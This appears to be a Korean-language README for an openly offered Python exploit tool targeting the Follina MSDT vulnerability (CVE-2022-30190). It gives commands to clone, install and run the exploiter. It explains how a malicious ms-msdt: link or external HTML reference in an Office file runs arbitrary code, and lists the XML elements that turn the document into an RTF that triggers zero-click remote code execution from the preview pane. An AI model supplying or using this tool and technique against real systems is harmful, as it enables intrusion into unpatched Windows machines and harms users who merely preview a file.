
MSDT(Microsoft Support Diagnostic Tool)의 제로데이 취약점(Follina CVE-2022-30190)을 익스플로잇하는 명령줄 기반 파이썬 도구입니다.
MSDT(지원 진단 도구)의 제로데이 취약점을 악용하기 위한 명령줄 기반 파이썬 도구로, 'Follina' CVE-2022-30190로도 알려져 있습니다.
Python(3.10.4)으로 제작됨
신규https://github.com/0xAbbarhSF/FollinaXploit
Linux용
pip3 install pyfiglet
한 줄 명령
git clone https://github.com/0xAbbarhSF/FollinaXploit && pip3 install pyfiglet && cd FollinaXploit
python3 "follinaExploiter.py"
Windows용
pip install pyfiglet
python "follinaExploiter.py"
해당 취약점은 MSProtocol URI 스킴을 사용하여 일부 코드를 로드함으로써 악용됩니다. 공격자는 Microsoft Office 문서, 템플릿 또는 이메일에 ms-msdt:로 시작하는 악성 링크를 포함시킬 수 있으며, 이는 사용자 상호 작용 없이 로드 및 실행됩니다.
MS Office docx 파일은 HTML 파일로 외부 OLE 개체 참조를 포함할 수 있습니다. "ms-msdt:"라는 HTML 스킴이 있으며, 이는 msdt 진단 도구를 호출하여 (매개변수에 지정된) 임의의 코드를 실행할 수 있습니다.
또한 word/document.xml의 <o:OLEObject> 요소 아래에 다음 요소를 추가하면
<o:LinkType>EnhancedMetaFile</o:LinkType>
<o:LockedField>false</o:LockedField>
<o:FieldCodes>\f 0</o:FieldCodes>
그러면 RTF로도 작동합니다 (결과 docx를 열고 RTF로 저장하세요).
RTF의 경우 Word에서 파일을 열 필요가 없으며, 파일을 탐색하여 미리 보기 창에서 보는 것만으로 충분합니다. 미리 보기 창이 외부 HTML 페이로드를 트리거하고 클릭 없이 RCE가 발생합니다.